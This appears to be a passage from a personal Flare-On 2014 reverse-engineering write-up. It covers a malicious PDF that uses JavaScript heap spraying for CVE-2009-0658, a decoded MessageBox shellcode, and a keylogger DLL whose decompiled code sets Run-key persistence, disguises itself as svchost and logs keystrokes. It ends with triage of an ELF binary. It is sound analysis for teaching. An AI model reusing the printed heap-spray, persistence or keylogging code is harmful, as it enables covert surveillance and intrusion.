array_variable = new Array();
35

36
for (counter_variable = 0; counter_variable < 125; counter_variable++) array_variable[counter_variable] = substring2_of_str2 + string_variable_2;

But you might be confused that how this code will executed because it is in PDF right?
So here comes the interesting thing,
- CVE-2009-0658 is a heap corruption vulnerability in Adobe Reader’s JBIG2Decode filter.
- A malformed JBIG2 image causes memory overwrite in native code.
- JavaScript heap spray is used beforehand to populate predictable heap memory with shellcode.
- When the corrupted pointer is dereferenced, execution jumps into the sprayed heap region, leading to arbitrary code execution.
- One of the first PDF + JS + native bug chains
So in short, if any user open this code in vulnerable Adobe Reader then this code will execute.

Code Explanation#

It hides malicious code
- The long %uXXXX%uXXXX data is hidden machine code / shellcode.
- unescape() converts it into real binary data.
It creates a lot of useless repeated data
- Repeated patterns are added again and again.
- This fills large parts of computer memory.
It mixes junk + malicious code
- So memory looks like: junk junk junk → malicious code
It puts this data many times into memory
- Hundreds of copies are created.
- This is called heap spraying.
Why it does this
- Later, when Adobe Reader crashes due to a bug,
  the program may jump to a random memory address.
- Because memory is full of attacker data,
  it lands on the malicious code.

Carving Next Stage#

After some code reading and research i found that string_variable_4 is the var which has next stage shellcode but it is encoded in some format in js so i did research and this is what i found,
The unescape() function replaces any escape sequence with the character that it represents. Specifically, it replaces any escape sequence of the form %XX or %uXXXX (where X represents one hexadecimal digit) with the character that has the hexadecimal value XX/XXXX. If the escape sequence is not a valid escape sequence (for example, if % is followed by one or no hex digit), it is left as-is.

Pasted image 20260125234050.png

So to decode this i used cyberchef, and we have to convert the endianness because it is being written in heap so we will swap it by word length of 8.
We will save this as shellcode.bin

Pasted image 20260125233857.png

CyberChef Recipe,

1
[
2
  { "op": "Find / Replace",
3
    "args": [{ "option": "Simple string", "string": "%u" }, "", true, false, true, false] },
4
  { "op": "Swap endianness",
5
    "args": ["Hex", 2, true] },
6
  { "op": "From Hex",
7
    "args": ["Auto"],
8
    "disabled": true }
9
]

Stage 2 Analyzing Shellcode#

Initial Triage#

File Type: data
Size: 1 KB
SHA256: 71d7690eaab011871f8e957c354e96baa16ed14ddcf719caf0776917b5eebe2d

Basic Static Analysis#

I quickly check VT for this hash and only 1 out of 54 which means this can be obfuscated and some spoofy things,

Pasted image 20260125234637.png

For simplicity i used tool flare-floss for intelligent string analysis and here is what i found,

1
┌──(b14cky㉿DESKTOP-VRSQRAJ)-[~]
2
└─$ /opt/floss shellcode.bin --format sc32
3

4
INFO: floss: extracting static strings
5
finding decoding function features: 100%|█████████████████████████████████████████████████████████████████████| 1/1 [00:00<00:00, 126.37 functions/s, skipped 0 library functions]
6
INFO: floss.stackstrings: extracting stackstrings from 1 functions
7
INFO: floss.results: LoadLibraryA
8
INFO: floss.results: user32
9
INFO: floss.results: MessageBoxA
10
INFO: floss.results: OWNED!!!
11
INFO: floss.results: 2OWNED!!!
12
INFO: floss.results: OWNE
13
INFO: floss.results: ExitProcessb
14
extracting stackstrings: 100%|██████████████████████████████████████████████████████████████████████████████████████████████████████████████| 1/1 [00:00<00:00, 28.02 functions/s]
15
INFO: floss.tightstrings: extracting tightstrings from 0 functions...
16
extracting tightstrings: 0 functions [00:00, ? functions/s]
17
INFO: floss.string_decoder: decoding strings
18
decoding strings: 100%|█████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 1/1 [00:00<00:00, 85.55 functions/s]
19
INFO: floss: finished execution after 7.19 seconds
20
INFO: floss: rendering results
21

22

23
FLARE FLOSS RESULTS (version v3.1.1-0-g3cd3ee6)
24

25
.
26
.
27
.
28

29
 ───────────────────────────
30
  FLOSS STATIC STRINGS (31)
31
 ───────────────────────────
32

33
+----------------------------------+
34
| FLOSS STATIC STRINGS: ASCII (31) |
35
+----------------------------------+
36

37
rIF%
38
xsq}
39
$~|C
40
.
41
.
42
.
43
hess
44
hProchExitT
45
T$@W
46

47

48
+------------------------------------+
49
| FLOSS STATIC STRINGS: UTF-16LE (0) |
50
+------------------------------------+
51

52

53
 ─────────────────────────
54
  FLOSS STACK STRINGS (7)
55
 ─────────────────────────
56

57
LoadLibraryA
58
user32
59
MessageBoxA
60
OWNED!!!
61
2OWNED!!!
62
OWNE
63
ExitProcessb
64

65
 ─────────────────────────
66
  FLOSS TIGHT STRINGS (0)
67
 ─────────────────────────
68
 ───────────────────────────
69
  FLOSS DECODED STRINGS (0)

There are some interesting stack strings,
- LoadLibraryA : loads required Windows DLLs at runtime
- MessageBoxA : displays a message box (proof of code execution)
- ExitProcess : - cleanly terminates the program after execution
And some string so we will look that later,

Advance Static Analysis#

To analyze this shellcode, i can use cutter so i simply paste shellcode in cutter and analyze the assembly,

Pasted image 20260125235540.png

In this disassembler, there are 2 functions, fcn.00000000 and fcn.0000035e,
fcn.00000000 looks very large and messy,

Pasted image 20260125235749.png

I analyze some part of fcn.00000000 and i found that it is loading some strings in stack for some purpose as we discuss earlier,

![[Learning/DFIR & MARE/Reverse Engineering/Flare-On/2014/images/Pasted image 20260118140837.png]]

So i look at the fcn.0000035e function and i found that,
- It is building encrypted data on the stack and decrypting it in place using XOR, so the real strings only exist in memory at runtime.

Pasted image 20260126001620.png

Here is the script that do whole decryption and transformation of hex and convert it to ascii,

1
# XOR operations
2
xor_pairs = [
3
    (0x32fba316, 0x32bece79),
4
    (0x48cf45ae, 0x2be12bc1),
5
    (0xd29f3610, 0xfffa4471),
6
    (0x0ca9a9f7, 0x60cfe984),
7
    (0x43a993be, 0x3798a3d2),
8
    (0x3b628a82, 0x4b11a4ef),
9
    (0xccc047d6, 0xffa469be),
10
    (0x3154caa3, 0x5265abd4)
11
]
12

13
# Calculate XOR results
14
xor_results = [val1 ^ val2 for val1, val2 in xor_pairs]
15
print("XOR Results:", [f"0x{r:08x}" for r in xor_results])
16

17
# Combine into single hex string
18
combined_hex = ''.join([f"{result:08x}" for result in xor_results])
19
print(f"Combined: {combined_hex}")
20

21
# Convert to bytes and reverse
22
hex_bytes = bytes.fromhex(combined_hex)
23
reversed_bytes = hex_bytes[::-1]
24

25
# Convert to ASCII
26
output = reversed_bytes.decode('ascii', errors='replace')
27
print(f"Output: {output}")

1
┌──(b14cky㉿DESKTOP-VRSQRAJ)-[~/]
2
└─$ python decr.py
3

4
XOR Results: ['0x00456d6f', '0x632e6e6f', '0x2d657261', '0x6c664073', '0x7431306c', '0x70732e6d', '0x33642e68', '0x63316177']
5
Combined: 00456d6f632e6e6f2d6572616c6640737431306c70732e6d33642e6863316177
6
Output: wa1ch.d3m.spl01ts@flare-on.comE

Here is the flag using static method,

1
wa1ch.d3m.spl01ts@flare-on.com

Advance Dynamic Analysis#

1
0x00000359      call    fcn.0000035e ; fcn.0000035e ;  fcn.0000035e(int64_t arg1)
2
fcn.0000035e(int64_t arg1);
3
; arg int64_t arg1 @ rdi
4
; var int64_t var_65h @ stack - 0x65
5
; var int64_t var_48h @ stack - 0x48
6
; var int64_t var_40h @ stack - 0x40
7
0x0000035e      mov     edx, dword [rsp]
8
0x00000361      xor     dword [rdx + 0xb], 0x32fba316
9
0x00000368      push    0x32bece79
10
0x0000036d      xor     dword [rdx + 0x17], 0x48cf45ae
11
0x00000374      push    0x2be12bc1
12
0x00000379      xor     dword [rdx + 0x23], 0xd29f3610
13
0x00000380      push    0xfffffffffffa4471
14
0x00000385      xor     dword [rdx + 0x2f], 0xca9a9f7
15
0x0000038c      push    0x60cfe984
16
0x00000391      xor     dword [rdx + 0x3b], 0x43a993be
17
0x00000398      push    0x3798a3d2
18
0x0000039d      xor     dword [rdx + 0x47], 0x3b628a82
19
0x000003a4      push    0x4b11a4ef
20
0x000003a9      xor     dword [rdx + 0x53], 0xccc047d6
21
0x000003b0      push    0xffffffffffa469be
22
0x000003b5      xor     dword [rdx + 0x5f], 0x3154caa3
23
0x000003bc      push    0x5265abd4
24
0x000003c1      mov     ecx, esp

This is how it works,
Now you might think that doing XOR first and then push value which is kind of reverse Because,
- It happens because the shellcode modifies its own instructions in memory.
- The values you see in push 32BECE79 are encrypted operands.
  - Before that instruction executes, the shellcode does:

1
xor dword ptr [edx+offset], key

This XOR rewrites the PUSH instruction itself in memory.
So when execution later reaches that instruction, the CPU fetches the modified bytes, not the original ones.
That’s why:

1
push 32BECE79 → becomes → push 00456D6F

Pasted image 20260126012407.png

Pasted image 20260118140837.png

Flag Extraction#

By putting breakpoint on 004013C1 we can see that esp is point to out flag so i do follow in dump for esp and i got the flag.

1
004013C1 | 8BCC                     | mov ecx,esp

Pasted image 20260118140846.png

Alon with flag we get those strings also which we got using floss, which are used to prompt a message box with some random text,

1
0019FF1C   77 61 31 63 68 2E 64 33 6D 2E 73 70 6C 30 31 74  wa1ch.d3m.spl01t
2
0019FF2C   73 40 66 6C 61 72 65 2D 6F 6E 2E 63 6F 6D 45 00  s@flare-on.comE
3
0019FF3C   5E 13 40 00 4F 57 4E 45 44 21 21 21 00 00 00 00  ^.@.OWNED
4
0019FF4C   4D 65 73 73 61 67 65 42 6F 78 41 00 75 73 65 72  MessageBoxA.
5
0019FF5C   33 32 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41  32..LoadLibraryA

Here is out Flag, 😗

1
wa1ch.d3m.spl01ts@flare-on.com

Pasted image 20260126013350.png

Challenge 5:#

Stage 1 Analyzing PE File#

Initial Triage#

File Type: 5get_it: PE32 executable for MS Windows 5.01 (DLL), Intel i386, 4 sections
Size: 99KB
SHA256: 2225b6966b9baae11ee5a8412201b30fd72c4a10e92727d92acf5ea6b5df9176

Basic Static Analysis#

Just quick VT search,
- It gives 48/69 hits so it is malicious and marked KeyLogger so maybe some keystroke things will be there,

Pasted image 20260128002927.png

Detect it Easy is showing that it is written in C++ and compiled with Visual Studio (2010).
- Also it is not packed because entropy is nomal,

Pasted image 20260128002704.png

Pasted image 20260128003244.png

Now we can analyze this binary with pestudio to get more idea,
In-fact, it gives lots of info such as,
- Our sample is a 32 bit DLL file with entry point address of 0x0000B186 and size of 101376 Bytes.
- And this binary compiled in 2014.

Pasted image 20260128005416.png

Now some silly floss things to see any interesting strings,
- it quite big and lots things are there so let’s break it down and show you some stuff.
As i said previously, this are some keystrokes,
- And to store them it impersonate the svchost a legit process’s log file which is svchost.log,

1
[SHIFT]
2
[RETURN]
3
[BACKSPACE]
4
[TAB]
5
[CTRL]
6
[DELETE]
7
[CAPS LOCK]
8
GetAsyncKeyState
9
svchost.log

It is a Keyboard + file write combo
- capture keystroke → write to file → flush.

1
GetAsyncKeyState
2
WriteFile
3
CreateFileA/W
4
FlushFileBuffers
5
SetFilePointer

Some registry keys used to do persistence with it’s related Windows APIs,

1
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
2
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
3
RegCloseKey
4
RegQueryValueExA
5
RegOpenKeyExA
6
RegSetValueExA
7
RegCreateKeyA

Something with DLL stuff,
- It references c:\windows\system32\svchost.dll and svchost.log but there is no such file (Windows has svchost.exe in that location).
- There is also c:\windows\system32\rundll32.exe c:\windows\system32\svchost.dll which means this file is most probably a DLL and should be executed like that.
- There are no parameters, so whatever this DLL is doing should be in DllMain.

1
c:\windows\system32\svchost.dll
2
c:\windows\system32\rundll32.exe c:\windows\system32\svchost.dll

Windows APIs related to Anti-Analysis Technique,

1
IsDebuggerPresent
2
Sleep
3
QueryPerformanceCounter

Finally, FLOSS decoded strings,

1
Courier New
2
DDNDNNNNDND
3
.
4
.
5
.
6
FLARE ON!

So only based on these basic analysis, we take overview of malware that how it could behave which helps us in advance analysis.

Advance Static Analysis#

Now Buckle down because we jumping into IDA for some low level stuff,
As i said previously, there is only one export which is DLLEntryPoint,
The Windows loader calls the DLL’s entry point defined in the PE Optional Header, which in MSVC-built DLLs is typically DllMainCRTStartup (often labeled as DLLEntryPoint by IDA).
And this DllMainCRTStartup will call DLLMain.

1
Here is the flow,
2
----------------------
3
Windows Loader
4
   ↓
5
AddressOfEntryPoint
6
   ↓
7
__DllMainCRTStartup
8
   ↓
9
DllMain
10
----------------------
11

12
More Technically it do these process,
13

14
ntdll!LdrLoadDll
15
    ↓
16
ntdll!LdrpCallInitRoutine
17
    ↓
18
PE.OptionalHeader.AddressOfEntryPoint
19
    ↓
20
__DllMainCRTStartup   ← CRT
21
    ↓
22
DllMain               ← user code

Here is the crux explanation,
- When a DLL is loaded, ntdll!LdrLoadDll maps it into memory, LdrpCallInitRoutine decides initialization, the loader jumps to the PE’s AddressOfEntryPoint (usually __DllMainCRTStartup), which initializes the C runtime (TLS, heap, SEH, globals) and finally calls the user-defined DllMain under the loader lock.

Pasted image 20260128010732.png

Here is the DLLMain Called,

Pasted image 20260128012223.png

Now this DLLMain is calling other bunch of other functions,
Here is function tree,
- sub_1000A570() - Doing Persistence by adding key in Registry
- sub_1000A610() - Checking the Key already present of not
- sub_1000AD77() - nothing important..
- sub_1000A4C0() - Just adding some noise to delay the process
  - sub_10009EB0 - Switch Case with all ASCII Chars
    - sub_10009AF0() - Case of Char ‘M’
      - sub_10009AF0() - Hidden Function
  - sub_10001000

Pasted image 20260128013233.png

`sub_1000A570` function,#

First i analyzed the sub_1000A570 function,

Pasted image 20260128013550.png

Inside the function we encounter RegOpenKeyEx that opens a registry key.
Full registry key is a combination of hKey and lpSubKey. hKey can be one of the predefined keys.
The constants for the predefined keys needed a bit of googling because the MSDN page didn’t list them. Here they are:

1
| Key                 | Constant |
2
|---------------------|----------|
3
| HKEY_CLASSES_ROOT   |    0     |
4
| HKEY_CURRENT_USER   |    1     |
5
| HKEY_LOCAL_MACHINE  |    2     |
6
| HKEY_USERS          |    3     |
7
| HKEY_CURRENT_CONFIG |    5     |

1
v3 = RegOpenKeyExA(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", 0, 1u, &phkResult);

Here is the arguments and if we map with MSDN function then it looks like this,

1
LSTATUS RegOpenKeyExA(
2
  [in]           HKEY   hKey,        // HKEY_LOCAL_MACHINE (0x80000002)
3
  [in, optional] LPCSTR lpSubKey,     // "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
4
  [in]           DWORD  ulOptions,    // 0
5
  [in]           REGSAM samDesired,   // KEY_QUERY_VALUE (0x0001)
6
  [out]          PHKEY  phkResult     // &phkResult
7
);

So if we move further,
If function succeeds it will return ERROR_SUCCESS which is 0 according to this page, otherwise it will return another error code.
db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0 in .rdata section.
The binary will check if it has access to registry at that path.
If so then the return value (in eax) will be 0 and it will jump right (JZ will succeed).

Pasted image 20260128015409.png

1
v3 = RegQueryValueExA(phkResult, "svchost", 0, 0, Data, &cbData);

Here is the arguments and if we map with MSDN function then it looks like this,

1
LSTATUS RegQueryValueExA(
2
  [in]                HKEY    hKey,        // phkResult
3
  [in, optional]      LPCSTR  lpValueName, // "svchost"
4
                      LPDWORD lpReserved,  // 0
5
  [out, optional]     LPDWORD lpType,      // 0
6
  [out, optional]     LPBYTE  lpData,      // Data
7
  [in, out, optional] LPDWORD lpcbData     // &cbData
8
);

RegQueryValueEx checks if there is a registry key at an open path.
It is looking for a registry key named svchost at that path. If such key exists, function will return 0.
In this case, it returned 2 which stands for ERROR_FILE_NOT_FOUND meaning there was no such key.
Then it will call RegCloseKey and closes the open registry path. This function’s return value is saved in var_110 (we will need it later):

1
|           Condition          |         Return Value          |
2
|------------------------------|-------------------------------|
3
|Registry key cannot be opened |               1               |
4
|Registry key does not exist   |               2               |
5
|Registry key exists           | 1000A6BB or DllMain(x,x,x)+3B |

This DLL is self-installing malware that checks whether it already has persistence, installed itself if not, disguises itself as svchost, registers itself to run at every system startup via the Windows Run registry key, executes itself using rundll32, hides its console, and then enters an infinite loop performing its main malicious activity.
Now it calls sub_1000A610,

`sub_1000A610` function,#

Now this sub_1000A610 similar as previous and here is pseudocode,

1
int __cdecl sub_1000A610(BYTE *lpData)
2
{
3
  size_t v1; // eax
4
  HKEY phkResult[2]; // [esp+4h] [ebp-8h] BYREF
5

6
  if ( RegCreateKeyA(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", phkResult) )
7
    return 1;
8
  v1 = strlen((const char *)lpData);
9
  RegSetValueExA(phkResult[0], "svchost", 0, 1u, lpData, v1);
10
  phkResult[1] = 0;
11
  return 0;
12
}

Pasted image 20260128020153.png

We see that it is calling GetModuleHandleEx for sub_1000A610 and checks the return value .
The return value for GetModuleHandleEx will be non-zero, otherwise it will be zero. If call was not successful then last error will be printed to file.

Pasted image 20260128020523.png

Pasted image 20260128020624.png

If GetModuleHandleEx was successful it will land here.
GetModuleFileName is called which will return the full path for the specified module in hModule.
In this case, the binary retrieves its own path and saves it in [ebp+Filename].in return value of sub_1000A570 is compared with 2.
If registry key did not exist, we will continue.
We have already seen the strings being loaded.
Then CopyFileA is called to copy itself to c:\\windows\\system32\\svchost.dll.
It c:\windows\system32\rundll32.exe c:\windows\system32\svchost.dll to the stack and calls sub_1000A610 .
Based on this string and checking for existence of the registry key we can guess what is going to happen in this function.
Inside this function we see that RegCreateKey to open HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run. If the key does not exist, it will create it.
If call was successful, execution continues.
It is adding a new registry key named svchost to that path with the specified value. Then function will return with the result value of RegSetValueEx.
If it was successful, it will be 0.
The Dll copied itself to system32 and it will run every time Windows starts.

`sub_1000A4C0` Function#

Runs forever and repeatedly performs random‑count tasks using data returned by another function, with artificial delays and memory allocation used mainly for noise / evasion.
In short just not usefull.

1
void __noreturn sub_1000A4C0()
2
{
3
  char *Buffer; // [esp+0h] [ebp-14h]
4
  int v1; // [esp+4h] [ebp-10h]
5
  void *v2; // [esp+8h] [ebp-Ch]
6
  __int16 v3; // [esp+Ch] [ebp-8h]
7

8
  while ( 1 )
9
  {
10
    v1 = rand() % 200 + 50;
11
    v2 = malloc(15 * v1);
12
    memset(v2, 0, 15 * v1);
13
    Sleep(0xAu);
14
    v3 = 0;
15
    while ( v3 < v1 )
16
    {
17
      Sleep(0xAu);
18
      Buffer = (char *)sub_10009EB0();
19
      if ( Buffer )
20
      {
21
        sub_10001000(Buffer);
22
        ++v3;
23
      }
24
    }
25
  }
26
}

`sub_10009EB0` function,#

Pasted image 20260128021925.png

This loop is Scanning all keyboard keys to detect which key is pressed.
Loops through all virtual key codes from 8 to 222 and stops when it finds which key the user pressed.
A classic keylogger polling logic.
Here is mapping table of keystrokes and value,

1
SHORT GetAsyncKeyState(
2
  [in] int vKey // The virtual-key code
3
);

VK (Virtual key codes)	Value
VK_BACK	8
VK_TAB	9
VK_RETURN	13
VK_SHIFT	16
VK_CONTROL	17
VK_MENU (Alt)	18
VK_ESCAPE	27
’A’ - ‘Z’ or ‘a’ - ‘z’	65–90
F1–F12	112–123

1
for ( i = 8; ; ++i )
2
{
3
  if ( i > 222 )
4
    return 0;
5
  if ( GetAsyncKeyState(i) == 0xFFFF8001 )
6
    break;
7
    .
8
    .
9
    .

After getting that pressed key, we just pass it to switch case which will further call some functions,
And those functions are nothing but just a wrapper which return same character,

Pasted image 20260128022927.png

Pasted image 20260128023043.png

if given input is NOT a normal character then it goes to 2nd switch case,

Pasted image 20260128023400.png

1
v1 = i - 8;
2
switch (i)
3
{
4
  case 8:
5
  ....
6
  case 190:
7
}

Final crux of this function,
And one importent thing,
- This function is a keystroke dispatcher, not a string collector.
- It means this whole process happens for one char only and function return and execution goes to next function which is sub_10001000(Buffer);,

1
wait until user presses a key
2

3
if key is a letter/number/symbol:
4
    return that character
5
else if key is Enter / Backspace / Space / Shift:
6
    handle that action
7
else:
8
    ignore and keep waiting

`sub_10001000` function#

Writes the received character into a file called svchost.log.
And this whole process happens with that sub_1000A4C0 function sleep time or just delay to make it stealth.

1
int __cdecl sub_10001000(char *Buffer)
2
{
3
  FILE *Stream; // [esp+0h] [ebp-4h]
4

5
  for ( Stream = 0; !Stream; Stream = fopen("svchost.log", "a+") )
6
    Sleep(0xAu);
7
  fputs(Buffer, Stream);
8
  fclose(Stream);
9
  return 1;
10
}

Now what about flag,
Here is some puzzle thing,
- This function is for char ‘M’ and it has hidden logic,
- sub_10001240 hidden function

Pasted image 20260128234520.png

Pasted image 20260128234632.png

1
const char *sub_10009AF0()
2
{
3
  if ( dword_100194FC > 0 )
4
  {
5
    _cfltcvt_init();
6
    sub_10001240();
7
  }
8
  return "m";
9
}

now this sub_10001240() is just printing banner with some cools ascii art,

1
INT_PTR sub_10001240()
2
{
3
  HINSTANCE WindowLongA; // [esp+0h] [ebp-1590h]
4
  wchar_t v2[12]; // [esp+4h] [ebp-158Ch] BYREF
5
  HWND hWnd; // [esp+1Ch] [ebp-1574h]
6
  wchar_t v4[2728]; // [esp+20h] [ebp-1570h] BYREF
7
  LPARAM dwInitParam; // [esp+1570h] [ebp-20h]
8
  HINSTANCE hInstance; // [esp+1574h] [ebp-1Ch]
9
  wchar_t Source[10]; // [esp+1578h] [ebp-18h] BYREF
10

11
  hWnd = 0;
12
  dwInitParam = 0;
13
  wcscpy(v2, L"Courier New");
14
  wcscpy(Source, L"FLARE ON!");
15
  wcscpy(
16
    v4,
17
    L"_______________________________________________NDD__________________________________________________\n"
18
     "______________________________________________DDDDD_________________________________________________\n"
19
     "______________________________________________DDDDDN________________________________________________\n"
20
     "_____________________________________________DDDDDDD________________________________________________\n"
21
     "NNNNNNNNDDN________DNNN_____________________NDDDDDDDD_______________NNNNNNNNDN__________DNNNNNNNNNNN\n"
22
     "DDDDDDDDDDD________NDDD____________________NDDDDDDDDDN______________DDDDDDDDDDDD________DDDDDDDDDDDD\n"
23
     "DDDDDDDDDDD________NDDD____________________NDDDDDDDDDD______________DDDDDDDDDDDDN_______NDDDDDDDDDDD\n"
24
     "DDDD_______________DDDD___________________NDDDDDDDDDDDD_____________DDDD_____NDDD_______DDDD________\n"
25
     "DDDD_______________DDDD__________________DDDDDDD_DDDDDDN____________DDDD_____DDDD_______DDDD________\n"
26
     "DDDDDDDDDD_________DDDD__________________NDDDDD___DDDDDDN___________DDDDDNNNNDDDN_______DDDDDDDDDD__\n"
27
     "DDDDDDDDDD_________DDDD_________________DDDDDDN___DNDDDDD___________DDDDDDDDDDD_________DDDDDDDDDD__\n"
28
     "DDDD_______________DDDD________________DDDDDDD_____DDDDDDD__________DDDD__DDDD__________DDDD________\n"
29
     "DDDD_______________DDDD_______________DDDDDDD_______DDDDDDD_________DDDD__NNDDD_________DDDD________\n"
30
     "DDDD_______________DDDDNNNNNN_________NDDDDDN_______NDDDDDD_________DDDD___DDDDN________DDDDNNNNNNNN\n"
31
     "DDDD_______________DDDDDDDDDDD_______NDDDDDD_________NDDDDDD________DDDD____DDDD________DDDDDDDDDDDD\n"
32
     "DDDN_______________DDDDDDDDDDN______NDDDDDDDDDDDDDDD__DDDDDDD_______NDDD_____DDDD_______DDDDDDDDDDDN\n"
33
     "____________________________________DDDDDDDDDDDDDDDN___DDDDDDN______________________________________\n"
34
     "___________________________________DDDDDDDDDDDDDDD_____DDDDDDD______________________________________\n"
35
     "__________________________________DDDDDDDDDDDDDDN_______DDDDDDD_____________________________________\n"
36
     "________________________________________NDDDDDN_____________________________________________________\n"
37
     "_______________________________________DNDDDDN______________________________________________________\n"
38
     "_______________________________________DDDDD________________________________________________________\n"
39
     "______________________________________DDDDD_________________________________________________________\n"
40
     "_____________________________________DDDDD__________________________________________________________\n"
41
     "_____________________________________NDD____________________________________________________________\n"
42
     "____________________________________NDD_____________________________________________________________\n"
43
     "___________________________________DD_______________________________________________________________\n");
44
  wcscpy(&Destination, Source);
45
  wcscpy(&word_10017034, v2);
46
  wcscpy(&word_10017062, v4);
47
  if ( hWnd )
48
    WindowLongA = (HINSTANCE)GetWindowLongA(hWnd, -6);
49
  else
50
    WindowLongA = GetModuleHandleA(0);
51
  hInstance = WindowLongA;
52
  return DialogBoxIndirectParamW(WindowLongA, &hDialogTemplate, hWnd, DialogFunc, dwInitParam);
53
}

But again it doesn’t have flag so i looks up little bit and here is what i understand,
- This program pretends to be a keylogger, but it is actually a flag puzzle.
- There is NO place where the flag exists as a string.
- The flag is never stored.
- The flag is never assembled.
- The flag exists only as logic.
Under the hood:
- Each key has its own function
- Each function returns one small string
- "a"
- "m"
- "dot"
- "at"
Some functions also set hidden memory flags
Those memory flags are the real secret.
Here are those variables,

Pasted image 20260128235204.png

THE TRICK
- You are NOT supposed to type the flag.
- Typing is a decoy.
The real flag is determined by:
- which functions set those dword flags
- and the order of those flags
I know it looks weird and tricky, but I also find it very difficult, so this is my understanding.
So to do this i referred one python script by xbyte, so credit goes to him.
Here is the script,

1
#!/usr/bin/env python3
2

3
import r2pipe
4
import os
5

6
keys = [
7
    "0x10017000","0x10019460","0x10019464","0x10019468","0x1001946c",
8
    "0x10019470","0x10019474","0x10019478","0x1001947c","0x10019480",
9
    "0x10019484","0x10019488","0x1001948c","0x10019490","0x10019494",
10
    "0x10019498","0x1001949c","0x100194a0","0x100194a4","0x100194a8",
11
    "0x100194ac","0x100194b0","0x100194b4","0x100194b8","0x100194bc",
12
    "0x100194c0","0x100194c4","0x100194c8","0x100194cc","0x100194d0",
13
    "0x100194d4","0x100194d8","0x100194dc","0x100194e0","0x100194e4",
14
    "0x100194e8","0x100194ec","0x100194f0","0x100194f4","0x100194f8",
15
    "0x100194fc","0x10019500"
16
]
17

18
flag = ""
19

20
if os.path.isfile("5get_it.dll"):
21

22
    r2 = r2pipe.open("5get_it.dll")
23
    r2.cmd("aaaa")
24

25
    for key in keys:
26
        xrefs = r2.cmdj("axtj " + key)
27
        if not xrefs:
28
            continue
29

30
        for xref in xrefs:
31
            if xref.get("opcode") == f"mov dword [{key}], 1":
32

33
                fcn_called = r2.cmdj("pdfj@" + xref["fcn_name"])
34
                if not fcn_called:
35
                    continue
36

37
                for op in fcn_called.get("ops", []):
38
                    dis = op.get("disasm", "")
39
                    if "mov eax, 0x100" in dis:
40
                        addr = dis.split(",")[1].strip()
41
                        ch = r2.cmd(f"pr 1 @ {addr}")
42
                        flag += ch.strip()
43

44
    r2.quit()
45

46
replacements = {
47
    "dot": ".",
48
    "dash": "-",
49
    "at": "@"
50
}
51

52
for k, v in replacements.items():
53
    flag = flag.replace(k, v)
54

55
print(flag)

1
┌──(b14cky㉿DESKTOP-VRSQRAJ)-[~/]
2
└─$ python flag.py
3
WARN: Relocs has not been applied. Please use `-e bin.relocs.apply=true` or `-e bin.cache=true` next time
4
INFO: Analyze all flags starting with sym. and entry0 (aa)
5
INFO: Analyze imports (af@@@i)
6
INFO: Analyze entrypoint (af@ entry0)
7
INFO: Analyze symbols (af@@@s)
8
INFO: Analyze all functions arguments/locals (afva@@@F)
9
INFO: Analyze function calls (aac)
10
INFO: Analyze len bytes of instructions for references (aar)
11
INFO: Finding and parsing C++ vtables (avrr)
12
INFO: Analyzing methods (af @@ method.*)
13
INFO: Recovering local variables (afva@@@F)
14
INFO: Type matching analysis for all functions (aaft)
15
INFO: Propagate noreturn information (aanr)
16
INFO: Scanning for strings constructed in code (/azs)
17
INFO: Finding function preludes (aap)
18
INFO: Enable anal.types.constraint for experimental type propagation
19
l0gging.ur.5tr0ke5@flare-on.co

Here is the falg,

1
l0gging.ur.5tr0ke5@flare-on.co

Challenge 6:#

Stage 1 ELF Analysis#

Initial Triage#

File Type: e7bc5d2c0cf4480348f5504196561297: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, for GNU/Linux 2.6.24, BuildID[sha1]=c65164a247cb0c44cab89c0fc06980bf6c082011, stripped
Size: 1.16 MB
SHA256: 3487e1de75bcb6f2c1425ca4f9b5da8fb66387343bf4a217c5a5cf93c79f0d9d

Basic Static Analysis#

Just quick VT search,
- It gives 0/69 hits so it is very weird so we will do some analysis on it,

Pasted image 20260129104603.png

Detect it Easy (Die) show that this file is written in C language and compiled using GCC in ubuntu system which means it is elf binary.
It is stripped binary so symbol was be removed so it might be difficult to analyze easily.

Pasted image 20260129104631.png

It seems not packed so we don’t need to do heavy unpacking stuff,

Pasted image 20260129105324.png

For better analysis i switched to remnux which is linux based malware analysis lab to doing some work on elf and linux executables.
I used readelf tool to get some info about binary and here it is,

1
remnux@remnux:~/Documents/Flare-on/2014/Chall5$ readelf -h e7bc5d2c0cf4480348f5504196561297
2
ELF Header:
3
  Magic:   7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00
4
  Class:                             ELF64
5
  Data:                              2's complement, little endian
6
  Version:                           1 (current)
7
  OS/ABI:                            UNIX - System V
8
  ABI Version:                       0
9
  Type:                              EXEC (Executable file)
10
  Machine:                           Advanced Micro Devices X86-64
11
  Version:                           0x1
12
  Entry point address:               0x401058
13
  Start of program headers:          64 (bytes into file)
14
  Start of section headers:          1219080 (bytes into file)
15
  Flags:                             0x0
16
  Size of this header:               64 (bytes)
17
  Size of program headers:           56 (bytes)
18
  Number of program headers:         6
19
  Size of section headers:           64 (bytes)
20
  Number of section headers:         31
21
  Section header string table index: 30

Here is silly floss strings which might be worth to look,
It is not that much interesting but there are some strings which looks like cpp code ad some linux commands maybe used in this binary.
there is some interesting strings which is,

1
/index.html Nosebleed # Heartbleed eh? :) ../nptl/sysdeps/unix/sysv/linux/x86_64/../fork.c info[20]->d_un.d_val == 7

1
remnux@remnux:~/Documents/Flare-on/2014/Chall5$ floss e7bc5d2c0cf4480348f5504196561297 --format sc64 | less > floss_strings.txt
2

3
INFO: floss: extracting static strings
4
finding decoding function features: 100%|██████████████████████| 1/1 [00:00<00:00, 453.63 functions/s, skipped 0 library functions]
5
INFO: floss.stackstrings: extracting stackstrings from 1 functions
6
extracting stackstrings: 100%|███████████████████████████████████████████████████████████████| 1/1 [00:00<00:00, 39.67 functions/s]
7
INFO: floss.tightstrings: extracting tightstrings from 0 functions...
8
extracting tightstrings: 0 functions [00:00, ? functions/s]
